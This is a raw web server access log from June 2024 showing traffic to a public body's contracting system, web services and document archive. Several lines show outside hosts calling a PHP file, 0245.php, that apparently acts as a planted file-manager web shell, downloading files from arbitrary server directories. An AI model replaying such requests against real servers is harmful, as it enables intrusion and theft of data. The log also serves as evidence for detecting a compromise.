181.63.25.20 - - [16/Jun/2024:20:35:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 73060
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:35:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.30.194 - - [16/Jun/2024:20:35:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3950.pdf&ft=download HTTP/1.1" 200 409255
186.102.3.156 - - [16/Jun/2024:20:35:16 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Fx3WpCL3dPUHyZjdqsXVX+uLxjH2sfKhZphU+C88rxPki7fygqQDZ+iyGot0SJ7OnTGEIDtx5mBvZJ4ZUHuw3VtDeRTCsDNRZ3ilY8B+hZdFlXzayamacyE09m2AxjdJ9jxj659fNTg==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 110
186.102.3.156 - - [16/Jun/2024:20:35:16 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Nq8hg1AAPHv4FVXY5UDLAft6yJ2DgTY1oSa/PEXGSJV832kyJ0xoDVrj46zq6PkCDJ0kc1loOUlldNkrrqC8GdeV+2tI4hkS26tG0Ru2HxD2veihbU7gee9pYxk/v2UIvnIYU6mfXq7hsMNJW7kPsmAoeHsW3jB9QJjD/1OjENG/JljC11NQwYujwwNtkZvY3qTpiOdh8reW8OUvy4fFlobq+Po/G8zRR51uSmJwQf3mejk/BsM4Wn+cGUf4i7mZWQllSeQYP5g==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:35:16 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+DdgxIBcreA1lXMH73U9lZ21zHSQDjA1g8iJHdW+AjPBXjmxghLNQiv9zzQ3OWnuIx/jztP670/uWcrgWBGrL21nP7h11oCUwvay0mXjf8UCSGkzx7tyRQhayxSJwmCCFetZkDFLR5ZHO/6XQhJmTu5+B79CtzXiYtn/FTrwd7CFqLcTTgFhMeud378YuDGPwvxewGM6yq2BsYMlURPENZOy5iAUC/lm3pR0v7qYbDpHM5gyKAZe3QRKe9vn0PG5zmrV+kEh28QQ==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 72
216.244.66.195 - - [16/Jun/2024:20:35:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2909.pdf HTTP/1.1" 200 271797
201.245.192.253 - - [16/Jun/2024:20:35:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.3.156 - - [16/Jun/2024:20:35:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+5xyd7xtC+cE56cicjbfEcUuQxF0fluSqZPGbHPixiuFBsaIo8hbrMf9vIurQjRxWlqb6H4RyqLrRT3ZfrFnYS7XYJscEIMY+4XKtEnE8lmuttcpz6Rjc/+WCEFKPFmUpWesEOaO+IuQ==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 110
186.102.3.156 - - [16/Jun/2024:20:35:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18AI2iK6JF8zb7EKfIUyfOK1VXhTaOtieW//8Zhkqv5u9IMOaMVBg0FitIhXNSCJ/sxCQLBV/31PICDCpVIAzntyhjD6z9wOSNvKXrZ4mRZfV7aB5n6Oe9ul+YOSO95l5qgpeE4XIDV52v6iUYRYM9FSiX+QFPlaziag+fK5rfeChw5fqE47KqIbEt9BIS0E696GpWMTRgP1sd0Kb6TCsgm/O1qe0bGmUpW3fKc1qe+pxntUSvwuLA9qDDuIFwh3kfKW+d4CDnlKA==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:35:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19CCos7tl73cM69j0XOCR6N4CFoodWm9JvBucNXcJ8KBbz/l/tpvxtodBF7+R4sujRj6zA4FxxcCSOiYkUJm9Gp7KyhFkrzmqiMKzHJ31cYwqD3GTfI06hErWkIztvYCxlYLpLF/6eL3h2ttA+QcMeEhHyauWdadRFakLnhar4GS6bsEepm9TQRmr+woVCBVMm2r04w/u3b3zpw/p4Xz6ROrR5kWy0yV/NU4/PE2JDVs5HbE2/X2FloYepqZYDRwUR653+nNyuaVQ==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 72
216.244.66.195 - - [16/Jun/2024:20:35:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3133.pdf HTTP/1.1" 200 328743
47.128.63.208 - - [16/Jun/2024:20:35:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1473.pdf&ft=download&white=1 HTTP/1.1" 200 895673
201.245.192.253 - - [16/Jun/2024:20:36:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:20:36:32 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
47.128.42.18 - - [16/Jun/2024:20:36:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=SusanaPOT.flv&ft=download&white=1 HTTP/1.1" 200 10354336
181.63.25.20 - - [16/Jun/2024:20:36:40 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 58392
181.63.25.20 - - [16/Jun/2024:20:36:40 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 30479
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.63.25.20 - - [16/Jun/2024:20:36:41 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:36:43 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9693
201.245.192.253 - - [16/Jun/2024:20:36:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36443
201.245.192.253 - - [16/Jun/2024:20:36:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34549
181.63.25.20 - - [16/Jun/2024:20:37:02 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 8038
181.63.25.20 - - [16/Jun/2024:20:37:02 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:11 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9249
47.128.29.130 - - [16/Jun/2024:20:37:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CParticipaci%F3n%5C&f=126PM01-PR05.pdf&ft=download&white=1 HTTP/1.1" 200 1269406
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 73881
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:20:37:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.126 - - [16/Jun/2024:20:37:21 -0500] "GET /robots.txt HTTP/1.1" 404 1034
181.63.25.20 - - [16/Jun/2024:20:37:25 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 40729
181.63.25.20 - - [16/Jun/2024:20:37:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:37:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
